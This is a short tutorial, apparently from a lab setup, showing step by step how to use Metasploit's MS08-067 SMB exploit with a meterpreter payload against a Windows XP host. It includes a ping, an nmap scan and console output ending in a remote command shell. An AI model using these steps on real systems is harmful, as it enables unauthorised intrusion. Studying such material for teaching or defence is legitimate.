How to metasploit windows XP

1.      Do ping first to IP windows

Ping 192.168.56.101

root@bt:~# ping 192.168.56.101

PING 192.168.56.101 (192.168.56.101) 56(84) bytes of data.

64 bytes from 192.168.56.101: icmp_seq=1 ttl=128 time=4.41 ms

64 bytes from 192.168.56.101: icmp_seq=2 ttl=128 time=0.633 ms

64 bytes from 192.168.56.101: icmp_seq=3 ttl=128 time=0.711 ms

2.      Scan to get the opening port

Nmap 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 00:09 WIT

Nmap scan report for 192.168.56.1

Host is up (0.000011s latency).

Not shown: 997 closed ports

PORT    STATE SERVICE

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds

902/tcp open  iss-realsecure

Nmap done: 1 IP address (1 host up) scanned in 13.26 seconds

3.      Run the metasploit

Msfconsole

4.      Choose the tools for exploit
msf> use windows/smb/ms08_067_netapi

5.      Choose the method for attacking
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

6.      Added the  IP of windows
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101

7.      Then  exploit it with
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (752128 bytes) to 192.168.56.101

[*] Meterpreter session 1 opened (192.168.56.1:33119 -> 192.168.56.101:4444) at 2012-01-28 00:36:19 +0700

8.      If shown a prompt as above, it  already works
meterpreter>

9.      Finally to execute the target:
meterpreter> execute -M -f cmd.exe –i

10.  And the result is:

Process 1728 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>